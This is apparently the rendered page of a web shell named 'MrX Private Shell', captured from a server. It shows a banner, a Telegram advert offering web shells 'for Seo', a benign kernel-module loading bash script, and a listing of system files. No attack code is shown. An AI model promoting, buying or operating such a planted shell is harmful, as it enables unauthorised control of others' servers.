__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/bash
ALIASES=/lib/modules/`uname -r`/modules.alias
n=0
while true; do
comp=OF_COMPATIBLE_${n}
comp=`echo ${!comp} | sed 's/.*,//'`
if [ "${comp}" == "" ]; then
break
fi
if grep -q "alias ${SUBSYSTEM}:${comp} " $ALIASES; then
modprobe "${SUBSYSTEM}:${comp}" && exit 0
fi
let n="$n + 1"
done
modprobe "${MODALIAS}" || modprobe "of:N${OF_NAME}T<NULL>C${OF_COMPATIBLE_0}"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| firstboot | File | 3.15 KB | 0755 |
|
| get_fw_loc | File | 698 B | 0755 |
|
| i2cprobe | File | 419 B | 0755 |
|
| imager_custom | File | 5.36 KB | 0755 |
|
| init_config | File | 7.15 KB | 0755 |
|
| regenerate_ssh_host_keys | File | 117 B | 0755 |
|
| sshswitch | File | 339 B | 0755 |
|